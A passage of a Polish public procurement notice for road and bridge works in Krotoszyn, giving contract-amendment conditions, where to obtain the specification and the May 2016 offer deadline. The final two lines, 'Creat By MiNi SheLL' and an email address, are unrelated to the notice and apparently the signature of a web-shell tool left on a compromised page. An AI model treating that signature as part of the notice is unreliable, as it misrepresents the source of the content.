wystąpienie niekorzystnych warunków atmosferycznych powodujących konieczność przerwania robót potwierdzonych przez inspektora nadzoru wpisem do dziennika budowy. Zamawiający dopuszcza możliwość  przedłużenia terminu przewidzianego na realizację zamówienia, o ilość dni w których te warunki wystąpią,wystąpienie nieprzewidzianych robót mających wpływ na prawidłowe wykonanie przedmiotu umowy, których realizacja powoduje konieczność przedłużenia terminu umowy podstawowej, Zamawiający dopuszcza przedłużenie tego terminu, o okres niezbędny do realizacji w/w robót,wystąpienie rozbieżności między dokumentacją projektową, a stanem rzeczywistym w terenie, powodujących konieczność wstrzymania robót potwierdzonych przez inspektora nadzoru w dzienniku budowy, o ilość dni wstrzymania robót,zmiany zakresu robót wynikających z wprowadzenia- w rozumieniu Prawa budowlanego- zmiany w dokumentacji projektowej,konieczność wykonania robót zamiennych lub niewykonanych. Roboty zamienne wyceniane będą przy użyciu  cen jednostkowych robót podstawowych określonych w kosztorysie ofertowym Wykonawcy.W przypadku braku w podstawowym kosztorysie ofertowym pozycji, której cenę można przyjąć do wyceny roboty zamiennej to cenę tej roboty należy wyliczyć przy użyciu stawek nie przekraczających średnich stawek z cennika dla robót mostowych za kwartał poprzedzający sporządzenie wyceny. Każda zmiana musi być poprzedzona sporządzeniem protokołu konieczności oraz protokołu z negocjacji, 
zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawek podatku,z przyczyn organizacyjnych ze strony Zamawiającego lub Wykonawcy w tym w strukturze organizacyjnej (zmiana lokalizacji siedziby , zmiana formy prawnej prowadzenia działalności),zmiany kluczowego personelu Zamawiającego lub Wykonawcy(zmiana osób zarządzających firmą, duża rotacja pracowników).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdkrotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg ulica Transportowa 1 , 63-700 Krotoszyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 09:00, miejsce: Starostwo Powiatowe w Krotoszynie ulica 56 Pułku Piechoty Wlkp 10 , 63-700 Krotoszyn, pokój nr 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com